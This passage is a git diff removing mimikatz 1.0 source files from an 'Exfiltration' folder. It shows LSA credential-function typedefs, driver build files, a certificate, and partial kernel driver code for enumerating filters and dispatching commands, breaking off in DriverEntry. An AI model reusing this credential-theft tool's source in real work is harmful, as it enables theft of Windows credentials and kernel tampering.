type - LsaTokenInformationV1, // Implies LSA_TOKEN_INFORMATION_V1 data type - LsaTokenInformationV2 // Implies LSA_TOKEN_INFORMATION_V2 data type -} LSA_TOKEN_INFORMATION_TYPE, *PLSA_TOKEN_INFORMATION_TYPE; - -typedef enum _SECPKG_NAME_TYPE { - SecNameSamCompatible, - SecNameAlternateId, - SecNameFlat, - SecNameDN, - SecNameSPN -} SECPKG_NAME_TYPE; - -typedef struct _SECPKG_CALL_INFO { - ULONG ProcessId; - ULONG ThreadId; - ULONG Attributes; - ULONG CallCount; - PVOID MechOid; // mechanism objection identifer -} SECPKG_CALL_INFO, * PSECPKG_CALL_INFO; - -typedef enum _SECPKG_SESSIONINFO_TYPE { - SecSessionPrimaryCred // SessionInformation is SECPKG_PRIMARY_CRED -} SECPKG_SESSIONINFO_TYPE; - -typedef struct _SECPKG_PRIMARY_CRED { - LUID LogonId; - UNICODE_STRING DownlevelName; // Sam Account Name - UNICODE_STRING DomainName; // Netbios domain name where account is located - UNICODE_STRING Password; - UNICODE_STRING OldPassword; - PSID UserSid; - ULONG Flags; - UNICODE_STRING DnsDomainName; // DNS domain name where account is located (if known) - UNICODE_STRING Upn; // UPN of account (if known) - UNICODE_STRING LogonServer; - UNICODE_STRING Spare1; - UNICODE_STRING Spare2; - UNICODE_STRING Spare3; - UNICODE_STRING Spare4; -} SECPKG_PRIMARY_CRED, *PSECPKG_PRIMARY_CRED; - -typedef struct _SECPKG_SUPPLEMENTAL_CRED { - UNICODE_STRING PackageName; - ULONG CredentialSize; -#ifdef MIDL_PASS - [size_is(CredentialSize)] -#endif // MIDL_PASS - PUCHAR Credentials; -} SECPKG_SUPPLEMENTAL_CRED, *PSECPKG_SUPPLEMENTAL_CRED; - -typedef struct _SECPKG_SUPPLEMENTAL_CRED_ARRAY { - ULONG CredentialCount; -#ifdef MIDL_PASS - [size_is(CredentialCount)] SECPKG_SUPPLEMENTAL_CRED Credentials[*]; -#else // MIDL_PASS - SECPKG_SUPPLEMENTAL_CRED Credentials[1]; -#endif // MIDL_PASS -} SECPKG_SUPPLEMENTAL_CRED_ARRAY, *PSECPKG_SUPPLEMENTAL_CRED_ARRAY; - -typedef NTSTATUS (WINAPI * PLSA_CALLBACK_FUNCTION) (ULONG_PTR Argument1, ULONG_PTR Argument2, PSecBuffer InputBuffer, PSecBuffer OutputBuffer); - -typedef NTSTATUS (WINAPI * PLSA_CREATE_LOGON_SESSION) (IN PLUID LogonId); -typedef NTSTATUS (WINAPI * PLSA_DELETE_LOGON_SESSION) (IN PLUID LogonId); -typedef NTSTATUS (WINAPI * PLSA_ADD_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue, IN PLSA_STRING Credentials); -typedef NTSTATUS (WINAPI * PLSA_GET_CREDENTIALS) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN OUT PULONG QueryContext, IN BOOLEAN RetrieveAllCredentials, IN PLSA_STRING PrimaryKeyValue, OUT PULONG PrimaryKeyLength, IN PLSA_STRING Credentials); -typedef NTSTATUS (WINAPI * PLSA_DELETE_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue); -typedef PVOID (WINAPI * PLSA_ALLOCATE_LSA_HEAP) (IN ULONG Length); -typedef VOID (WINAPI * PLSA_FREE_LSA_HEAP) (IN PVOID Base); -typedef PVOID (WINAPI * PLSA_ALLOCATE_PRIVATE_HEAP) (IN SIZE_T Length); -typedef VOID (WINAPI * PLSA_FREE_PRIVATE_HEAP) (IN PVOID Base); -typedef NTSTATUS (WINAPI * PLSA_ALLOCATE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG LengthRequired, OUT PVOID *ClientBaseAddress); -typedef NTSTATUS (WINAPI * PLSA_FREE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN PVOID ClientBaseAddress); -typedef NTSTATUS (WINAPI * PLSA_COPY_TO_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID ClientBaseAddress, IN PVOID BufferToCopy); -typedef NTSTATUS (WINAPI * PLSA_COPY_FROM_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID BufferToCopy, IN PVOID ClientBaseAddress); -typedef NTSTATUS (WINAPI * PLSA_IMPERSONATE_CLIENT) (VOID); -typedef NTSTATUS (WINAPI * PLSA_UNLOAD_PACKAGE) (VOID); -typedef NTSTATUS (WINAPI * PLSA_DUPLICATE_HANDLE) (IN HANDLE SourceHandle, OUT PHANDLE DestionationHandle); -typedef NTSTATUS (WINAPI * PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS) (IN PLUID LogonId, IN ULONG SupplementalCredSize, IN PVOID SupplementalCreds, IN BOOLEAN Synchronous); -typedef HANDLE (WINAPI * PLSA_CREATE_THREAD) (IN SEC_ATTRS SecurityAttributes, IN ULONG StackSize, IN SEC_THREAD_START StartFunction, IN PVOID ThreadParameter, IN ULONG CreationFlags, OUT PULONG ThreadId); -typedef NTSTATUS (WINAPI * PLSA_GET_CLIENT_INFO) (OUT PSECPKG_CLIENT_INFO ClientInfo); -typedef HANDLE (WINAPI * PLSA_REGISTER_NOTIFICATION) (IN SEC_THREAD_START StartFunction, IN PVOID Parameter, IN ULONG NotificationType, IN ULONG NotificationClass, IN ULONG NotificationFlags, IN ULONG IntervalMinutes, IN OPTIONAL HANDLE WaitEvent); -typedef NTSTATUS (WINAPI * PLSA_CANCEL_NOTIFICATION) (IN HANDLE NotifyHandle); -typedef NTSTATUS (WINAPI * PLSA_MAP_BUFFER) (IN PSecBuffer InputBuffer, OUT PSecBuffer OutputBuffer); -typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthorityName, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, OUT PHANDLE Token, OUT PNTSTATUS SubStatus); -typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN_EX) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, IN PVOID SessionInformation, IN SECPKG_SESSIONINFO_TYPE SessionInformationType, OUT PHANDLE Token, OUT PNTSTATUS SubStatus); -typedef VOID (WINAPI * PLSA_AUDIT_LOGON) (IN NTSTATUS Status, IN NTSTATUS SubStatus, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthenticatingAuthority, IN PUNICODE_STRING WorkstationName, IN OPTIONAL PSID UserSid, IN SECURITY_LOGON_TYPE LogonType, IN PTOKEN_SOURCE TokenSource, IN PLUID LogonId); -typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus); -typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGEEX) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus); -typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE_PASSTHROUGH) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus); -typedef BOOLEAN (WINAPI * PLSA_GET_CALL_INFO) (OUT PSECPKG_CALL_INFO Info); -typedef PVOID (WINAPI * PLSA_CREATE_SHARED_MEMORY) (ULONG MaxSize, ULONG InitialSize); -typedef PVOID (WINAPI * PLSA_ALLOCATE_SHARED_MEMORY) (PVOID SharedMem, ULONG Size); -typedef VOID (WINAPI * PLSA_FREE_SHARED_MEMORY) (PVOID SharedMem, PVOID Memory); -typedef BOOLEAN (WINAPI * PLSA_DELETE_SHARED_MEMORY) (PVOID SharedMem); -typedef NTSTATUS (WINAPI * PLSA_OPEN_SAM_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, BOOLEAN AllowGuest, ULONG Reserved, PVOID * UserHandle); -typedef NTSTATUS (WINAPI * PLSA_GET_USER_CREDENTIALS) (PVOID UserHandle, PVOID * PrimaryCreds, PULONG PrimaryCredsSize, PVOID * SupplementalCreds, PULONG SupplementalCredsSize); -typedef NTSTATUS (WINAPI * PLSA_GET_USER_AUTH_DATA) (PVOID UserHandle, PUCHAR * UserAuthData, PULONG UserAuthDataSize); -typedef NTSTATUS (WINAPI * PLSA_CLOSE_SAM_USER) (PVOID UserHandle); -typedef NTSTATUS (WINAPI * PLSA_GET_AUTH_DATA_FOR_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, PUCHAR * UserAuthData, PULONG UserAuthDataSize, PUNICODE_STRING UserFlatName); -typedef NTSTATUS (WINAPI * PLSA_CONVERT_AUTH_DATA_TO_TOKEN) (IN PVOID UserAuthData, IN ULONG UserAuthDataSize, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN PUNICODE_STRING AuthorityName, OUT PHANDLE Token, OUT PLUID LogonId, OUT PUNICODE_STRING AccountName, OUT PNTSTATUS SubStatus); -typedef NTSTATUS (WINAPI * PLSA_CRACK_SINGLE_NAME) (IN ULONG FormatOffered, IN BOOLEAN PerformAtGC, IN PUNICODE_STRING NameInput, IN PUNICODE_STRING Prefix OPTIONAL, IN ULONG RequestedFormat, OUT PUNICODE_STRING CrackedName, OUT PUNICODE_STRING DnsDomainName, OUT PULONG SubStatus); -typedef NTSTATUS (WINAPI * PLSA_AUDIT_ACCOUNT_LOGON) (IN ULONG AuditId, IN BOOLEAN Success, IN PUNICODE_STRING Source, IN PUNICODE_STRING ClientName, IN PUNICODE_STRING MappedName, IN NTSTATUS Status); -typedef NTSTATUS (WINAPI * PLSA_CLIENT_CALLBACK) (IN PCHAR Callback, IN ULONG_PTR Argument1, IN ULONG_PTR Argument2, IN PSecBuffer Input, OUT PSecBuffer Output); -typedef NTSTATUS (WINAPI * PLSA_REGISTER_CALLBACK) (ULONG CallbackId, PLSA_CALLBACK_FUNCTION Callback); -typedef NTSTATUS (WINAPI * PLSA_UPDATE_PRIMARY_CREDENTIALS) (IN PSECPKG_PRIMARY_CRED PrimaryCredentials, IN OPTIONAL PSECPKG_SUPPLEMENTAL_CRED_ARRAY Credentials); -typedef VOID (WINAPI * PLSA_PROTECT_MEMORY) (IN PVOID Buffer, IN ULONG BufferSize); -typedef NTSTATUS (WINAPI * PLSA_OPEN_TOKEN_BY_LOGON_ID) (IN PLUID LogonId, OUT HANDLE *RetTokenHandle); -typedef NTSTATUS (WINAPI * PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN) (IN PUCHAR UserAuthData, IN ULONG UserAuthDataSize, IN PVOID Reserved, OUT PUCHAR * ExpandedAuthData, OUT PULONG ExpandedAuthDataSize); - - - -#ifndef _ENCRYPTED_CREDENTIAL_DEFINED -#define _ENCRYPTED_CREDENTIAL_DEFINED - -typedef struct _ENCRYPTED_CREDENTIALW { - CREDENTIALW Cred; - ULONG ClearCredentialBlobSize; -} ENCRYPTED_CREDENTIALW, *PENCRYPTED_CREDENTIALW; -#endif // _ENCRYPTED_CREDENTIAL_DEFINED - -#define CREDP_FLAGS_IN_PROCESS 0x01 // Caller is in-process. Password data may be returned -#define CREDP_FLAGS_USE_MIDL_HEAP 0x02 // Allocated buffer should use MIDL_user_allocte -#define CREDP_FLAGS_DONT_CACHE_TI 0x04 // TargetInformation shouldn't be cached for CredGetTargetInfo -#define CREDP_FLAGS_CLEAR_PASSWORD 0x08 // Credential blob is passed in in-the-clear -#define CREDP_FLAGS_USER_ENCRYPTED_PASSWORD 0x10 // Credential blob is passed protected by RtlEncryptMemory -#define CREDP_FLAGS_TRUSTED_CALLER 0x20 // Caller is a trusted process (eg. logon process). - -typedef enum _CredParsedUserNameType -{ - parsedUsernameInvalid = 0, - parsedUsernameUpn, - parsedUsernameNt4Style, - parsedUsernameCertificate, - parsedUsernameNonQualified -} CredParsedUserNameType; - - -typedef NTSTATUS (NTAPI CredReadFn) (IN PLUID LogonId, IN ULONG CredFlags, IN LPWSTR TargetName, IN ULONG Type, IN ULONG Flags, OUT PENCRYPTED_CREDENTIALW *Credential); -typedef NTSTATUS (NTAPI CredReadDomainCredentialsFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PCREDENTIAL_TARGET_INFORMATIONW TargetInfo, IN ULONG Flags, OUT PULONG Count, OUT PENCRYPTED_CREDENTIALW **Credential); - -typedef VOID (NTAPI CredFreeCredentialsFn) (IN ULONG Count, IN PENCRYPTED_CREDENTIALW *Credentials OPTIONAL); -typedef NTSTATUS (NTAPI CredWriteFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PENCRYPTED_CREDENTIALW Credential, IN ULONG Flags); -typedef NTSTATUS (NTAPI CrediUnmarshalandDecodeStringFn)(IN LPWSTR MarshaledString, OUT LPBYTE *Blob, OUT ULONG *BlobSize, OUT BOOLEAN *IsFailureFatal); - -typedef struct _LSA_SECPKG_FUNCTION_TABLE { - PLSA_CREATE_LOGON_SESSION CreateLogonSession; - PLSA_DELETE_LOGON_SESSION DeleteLogonSession; - PLSA_ADD_CREDENTIAL AddCredential; - PLSA_GET_CREDENTIALS GetCredentials; - PLSA_DELETE_CREDENTIAL DeleteCredential; - PLSA_ALLOCATE_LSA_HEAP AllocateLsaHeap; - PLSA_FREE_LSA_HEAP FreeLsaHeap; - PLSA_ALLOCATE_CLIENT_BUFFER AllocateClientBuffer; - PLSA_FREE_CLIENT_BUFFER FreeClientBuffer; - PLSA_COPY_TO_CLIENT_BUFFER CopyToClientBuffer; - PLSA_COPY_FROM_CLIENT_BUFFER CopyFromClientBuffer; - PLSA_IMPERSONATE_CLIENT ImpersonateClient; - PLSA_UNLOAD_PACKAGE UnloadPackage; - PLSA_DUPLICATE_HANDLE DuplicateHandle; - PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS SaveSupplementalCredentials; - PLSA_CREATE_THREAD CreateThread; - PLSA_GET_CLIENT_INFO GetClientInfo; - PLSA_REGISTER_NOTIFICATION RegisterNotification; - PLSA_CANCEL_NOTIFICATION CancelNotification; - PLSA_MAP_BUFFER MapBuffer; - PLSA_CREATE_TOKEN CreateToken; - PLSA_AUDIT_LOGON AuditLogon; - PLSA_CALL_PACKAGE CallPackage; - PLSA_FREE_LSA_HEAP FreeReturnBuffer; - PLSA_GET_CALL_INFO GetCallInfo; - PLSA_CALL_PACKAGEEX CallPackageEx; - PLSA_CREATE_SHARED_MEMORY CreateSharedMemory; - PLSA_ALLOCATE_SHARED_MEMORY AllocateSharedMemory; - PLSA_FREE_SHARED_MEMORY FreeSharedMemory; - PLSA_DELETE_SHARED_MEMORY DeleteSharedMemory; - PLSA_OPEN_SAM_USER OpenSamUser; - PLSA_GET_USER_CREDENTIALS GetUserCredentials; - PLSA_GET_USER_AUTH_DATA GetUserAuthData; - PLSA_CLOSE_SAM_USER CloseSamUser; - PLSA_CONVERT_AUTH_DATA_TO_TOKEN ConvertAuthDataToToken; - PLSA_CLIENT_CALLBACK ClientCallback; - PLSA_UPDATE_PRIMARY_CREDENTIALS UpdateCredentials; - PLSA_GET_AUTH_DATA_FOR_USER GetAuthDataForUser; - PLSA_CRACK_SINGLE_NAME CrackSingleName; - PLSA_AUDIT_ACCOUNT_LOGON AuditAccountLogon; - PLSA_CALL_PACKAGE_PASSTHROUGH CallPackagePassthrough; - CredReadFn *CrediRead; - CredReadDomainCredentialsFn *CrediReadDomainCredentials; - CredFreeCredentialsFn *CrediFreeCredentials; - PLSA_PROTECT_MEMORY LsaProtectMemory; - PLSA_PROTECT_MEMORY LsaUnprotectMemory; - PLSA_OPEN_TOKEN_BY_LOGON_ID OpenTokenByLogonId; - PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN ExpandAuthDataForDomain; - PLSA_ALLOCATE_PRIVATE_HEAP AllocatePrivateHeap; - PLSA_FREE_PRIVATE_HEAP FreePrivateHeap; - PLSA_CREATE_TOKEN_EX CreateTokenEx; - CredWriteFn *CrediWrite; - CrediUnmarshalandDecodeStringFn *CrediUnmarshalandDecodeString; -} LSA_SECPKG_FUNCTION_TABLE, *PLSA_SECPKG_FUNCTION_TABLE; diff --git a/Exfiltration/mimikatz-1.0/driver/MAKEFILE b/Exfiltration/mimikatz-1.0/driver/MAKEFILE deleted file mode 100644 index 5acbbd2..0000000 --- a/Exfiltration/mimikatz-1.0/driver/MAKEFILE +++ /dev/null @@ -1 +0,0 @@ -!INCLUDE $(NTMAKEENV)\makefile.def diff --git a/Exfiltration/mimikatz-1.0/driver/MSCV-GlobalSign.cer b/Exfiltration/mimikatz-1.0/driver/MSCV-GlobalSign.cer deleted file mode 100644 index cdd3755..0000000 --- a/Exfiltration/mimikatz-1.0/driver/MSCV-GlobalSign.cer +++ /dev/null @@ -1,32 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIFfzCCA2egAwIBAgIKYQt/awAAAAAAGTANBgkqhkiG9w0BAQUFADB/MQswCQYD -VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe -MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSkwJwYDVQQDEyBNaWNyb3Nv -ZnQgQ29kZSBWZXJpZmljYXRpb24gUm9vdDAeFw0wNjA1MjMxNzAwNTFaFw0xNjA1 -MjMxNzEwNTFaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52 -LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxTaWduIFJvb3Qg -Q0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZjc6j40+Kfvvx -i4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavpxy0Sy6scTHAH -oT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp1Wrjsok6Vjk4 -bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdGsnUOhugZitVt -bNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJU26Qzns3dLlw -R5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N89iFo7+ryUp9/ -k5DPAgMBAAGjggEjMIIBHzARBgNVHSAECjAIMAYGBFUdIAAwNgYJKwYBBAGCNxUH -BCkwJwYfKwYBBAGCNxUIjeDRiU6E15zDB4amhvscj9O/phUBGQIBbgIBADALBgNV -HQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUYHtmGkUNl8qJUC99 -BM00qP/8/UswHQYJKwYBBAGCNxQCBBAeDgBDAHIAbwBzAHMAQwBBMB8GA1UdIwQY -MBaAFGL7CiFbf0NuEdoJVFBr9dKWcfGeMFUGA1UdHwROMEwwSqBIoEaGRGh0dHA6 -Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY3Jvc29mdENv -ZGVWZXJpZlJvb3QuY3JsMA0GCSqGSIb3DQEBBQUAA4ICAQATxWxeB388V/+bMV8/ -vZVUJcZ5+SwxA01kaUtW2VuXb3zz8NAkZXU4Y5gTcBYT96cB8cYj4IWGbAvwgJRa -deh85B6StHO/wbOnsAvTGITLzAmjXJxPPrA6nC0bxATvlzeWb+Xsuqxqs9TiPN+L -JeesvGJFMd2kCnLkG/h4QwHMujkU3l2Qrthaz17KRoFRM9WmDlhn09hmWIgWm+6x -GsqtkROEIdqabiDv2gB0KLrJX/NNXcPaJWklVOpEvMObKTMc1jyWH4eBxVPXKicz -1C4ZfAhYbdtOGZmp6l/zmp2MUTpaXL0vqQg1m1Sn2zUaUhYzNDqjgARq/bSDjK2Q -zww6ZZbsM04YJrhJu+uBkv8TTTJLI8cz57ZxaxX2nIDmvLdsvkHVAzpxMxUAUHQ7 -Dl35lqrtkD6rE0yAmSa8OKXrAjaJHbYgvoOrEPgZntdjedSusS9hNvlKS6gzxw5y -QfnxsZB+rkbv3jl7daBBFFkEHUK8R4i4Ew4F+h3wgI3/cMZ32EvcRg4jGnLVv97+ -qq5pWDz8XEbk1YGai25lWXcaMqWQprZkk2T9B1PJoN4orSpsxjjRgc6Y9UAZ6SwX -Q6QmX9NEMFPkHQK6pAovFt16YCdSQrutmDcol+S40nkR4xCMSNUwXQoMUt71iOqN -Gi1nyfSAFIS3hQzRZiilxm8kYQ== ------END CERTIFICATE----- diff --git a/Exfiltration/mimikatz-1.0/driver/SOURCES b/Exfiltration/mimikatz-1.0/driver/SOURCES deleted file mode 100644 index f544791..0000000 --- a/Exfiltration/mimikatz-1.0/driver/SOURCES +++ /dev/null @@ -1,9 +0,0 @@ -TARGETNAME=mimikatz -TARGETPATH=OBJ -TARGETTYPE=DRIVER -SOURCES=mimikatz.c \ - mod_memory.c \ - processes.c minifilters.c fsfilters.c modules.c ssdt.c \ - notify_process.c notify_thread.c notify_image.c notify_reg.c notify_object.c - -TARGETLIBS= $(TARGETLIBS) $(IFSKIT_LIB_PATH)\fltmgr.lib $(BASEDIR)\lib\wlh\*\aux_klib.lib $(DDK_LIB_PATH)\ntstrsafe.lib diff --git a/Exfiltration/mimikatz-1.0/driver/fsfilters.c b/Exfiltration/mimikatz-1.0/driver/fsfilters.c deleted file mode 100644 index fc80756..0000000 --- a/Exfiltration/mimikatz-1.0/driver/fsfilters.c +++ /dev/null @@ -1,35 +0,0 @@ -#include "fsfilters.h" - -NTSTATUS kFiltersList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status; - ULONG ActualNumberDriverObjects = 0; - PDRIVER_OBJECT * DriverObjectList = NULL; - - ULONG i; - - *ppszDestEnd = pszDest; - *pcbRemaining= cbDest; - - IoEnumerateRegisteredFiltersList(NULL, 0, &ActualNumberDriverObjects); - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kFiltersList - ActualNumberDriverObjects : %u\n\n", ActualNumberDriverObjects); - if(NT_SUCCESS(status)) - { - if(ActualNumberDriverObjects > 0) - { - DriverObjectList = ExAllocatePoolWithTag(NonPagedPool, sizeof(PDRIVER_OBJECT) * ActualNumberDriverObjects, POOL_TAG); - if(DriverObjectList != NULL) - { - IoEnumerateRegisteredFiltersList(DriverObjectList, sizeof(PDRIVER_OBJECT) * ActualNumberDriverObjects, &ActualNumberDriverObjects); - for(i = 0; (i < ActualNumberDriverObjects) && NT_SUCCESS(status); i++) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] %wZ\n",i , &(DriverObjectList[i]->DriverName)); - //DbgPrint("[%.2u] %wZ\n",i , &(DriverObjectList[i]->DriverName)); - ObDereferenceObject(DriverObjectList[i]); - } - ExFreePoolWithTag(DriverObjectList, POOL_TAG); - } - } - } - return status; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/driver/fsfilters.h b/Exfiltration/mimikatz-1.0/driver/fsfilters.h deleted file mode 100644 index 9e82e9c..0000000 --- a/Exfiltration/mimikatz-1.0/driver/fsfilters.h +++ /dev/null @@ -1,5 +0,0 @@ -#pragma once -#include <ntifs.h> -#include "k_types.h" - -NTSTATUS kFiltersList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/driver/k_types.h b/Exfiltration/mimikatz-1.0/driver/k_types.h deleted file mode 100644 index f82465f..0000000 --- a/Exfiltration/mimikatz-1.0/driver/k_types.h +++ /dev/null @@ -1,49 +0,0 @@ -#pragma once -#include <ntddk.h> -#include <ntstrsafe.h> - -#define MIN(a, b) (((a) < (b)) ? (a) : (b)) -#define MAX(a, b) (((a) > (b)) ? (a) : (b)) - -#ifndef KIWI_NameToFunc -#define KIWI_NameToFunc(Name, Function) if(taillFunc == sizeof(Name) - sizeof(WCHAR)) if(RtlCompareMemory(Name, buffer, taillFunc) == taillFunc) {*destFunc = Function; return STATUS_SUCCESS;} -#endif - -#ifndef KIWI_mask3bits -#define KIWI_mask3bits(addr) (((ULONG_PTR) (addr)) & ~7) -#endif - -#define POOL_TAG 'iwik' - -#define INDEX_UNK 0 -#define INDEX_XP 1 -#define INDEX_2K3 2 -#define INDEX_VISTA 3 -#define INDEX_2K8 4 -#define INDEX_7 5 -#define INDEX_2K8R2 6 -#define INDEX_8 7 -#define MAX_OS_LEN 8 - -#ifdef _M_IX86 -#define EX_FAST_REF_MASK 0x07 -#else -#define EX_FAST_REF_MASK 0x0f -#endif - -typedef NTSTATUS (* ptrLocalFunction) (LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); - -ULONG INDEX_OS; - -PDRIVER_OBJECT moi; - -typedef struct _SERVICE_DESCRIPTOR_TABLE { -#ifdef _M_IX86 - PVOID *ServiceTable; -#else - LONG *OffsetToService; -#endif - PULONG CounterTable; - ULONG TableSize; - PUCHAR ArgumentTable; -} SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE; diff --git a/Exfiltration/mimikatz-1.0/driver/mimikatz.c b/Exfiltration/mimikatz-1.0/driver/mimikatz.c deleted file mode 100644 index d109eac..0000000 --- a/Exfiltration/mimikatz-1.0/driver/mimikatz.c +++ /dev/null @@ -1,193 +0,0 @@ -#include "mimikatz.h" - -ptrLocalFunction maFunc = NULL; - -NTSTATUS UnSupported(PDEVICE_OBJECT DeviceObject, PIRP Irp) -{ - return STATUS_NOT_SUPPORTED; -} - -NTSTATUS Write(PDEVICE_OBJECT DeviceObject, PIRP Irp) -{ - NTSTATUS status = STATUS_INVALID_PARAMETER; - PIO_STACK_LOCATION pIoStackIrp = NULL; - PWSTR params; - size_t tailleParams; - - pIoStackIrp = IoGetCurrentIrpStackLocation(Irp); - if(Irp->AssociatedIrp.SystemBuffer && pIoStackIrp) - { - status = getLocalFuncFromName((LPWSTR) Irp->AssociatedIrp.SystemBuffer, pIoStackIrp->Parameters.Write.Length, ¶ms, &tailleParams, &maFunc); - - if(NT_SUCCESS(status)) - { - Irp->IoStatus.Information = pIoStackIrp->Parameters.Write.Length; - } - } - IoCompleteRequest(Irp, IO_NO_INCREMENT); - Irp->IoStatus.Status = status; - - return status; -} - -NTSTATUS Read(PDEVICE_OBJECT DeviceObject, PIRP Irp) -{ - NTSTATUS status = STATUS_INVALID_HANDLE; - PIO_STACK_LOCATION pIoStackIrp = NULL; - - LPWSTR pszDestEnd; - size_t pcbRemaining; - - pIoStackIrp = IoGetCurrentIrpStackLocation(Irp); - if(Irp->AssociatedIrp.SystemBuffer && pIoStackIrp) - { - if(maFunc) - { - status = maFunc((LPWSTR) Irp->AssociatedIrp.SystemBuffer, pIoStackIrp->Parameters.Read.Length, &pszDestEnd, &pcbRemaining); - - if(NT_SUCCESS(status)) - { - Irp->IoStatus.Information = pIoStackIrp->Parameters.Read.Length - pcbRemaining; - } - } - else - { - status = STATUS_PROCEDURE_NOT_FOUND; - } - } - IoCompleteRequest(Irp, IO_NO_INCREMENT); - Irp->IoStatus.Status = status; - - return status; -} - -void DriverUnload(IN PDRIVER_OBJECT theDriverObject) -{ - UNICODE_STRING UStrDosDeviceName; - RtlInitUnicodeString(&UStrDosDeviceName, L"\\DosDevices\\mimikatz"); - IoDeleteSymbolicLink(&UStrDosDeviceName); - IoDeleteDevice(theDriverObject->DeviceObject); -} - -NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath) -{ - NTSTATUS status; - UNICODE_STRING UStrDriverName, UStrDosDeviceName; - PDEVICE_OBJECT pDeviceObject = NULL; - ULONG i; - - moi = theDriverObject; - RtlInitUnicodeString(&UStrDriverName, L"\\Device\\mimikatz"); - status = IoCreateDevice(theDriverObject, 0, &UStrDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject); - - if(NT_SUCCESS(status)) - { - INDEX_OS = getWindowsIndex(); - - for(i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) - theDriverObject->MajorFunction[i] = UnSupported; - - theDriverObject->MajorFunction[IRP_MJ_READ] = Read; - theDriverObject->MajorFunction[IRP_MJ_WRITE] = Write; - - theDriverObject->DriverUnload = DriverUnload; - - 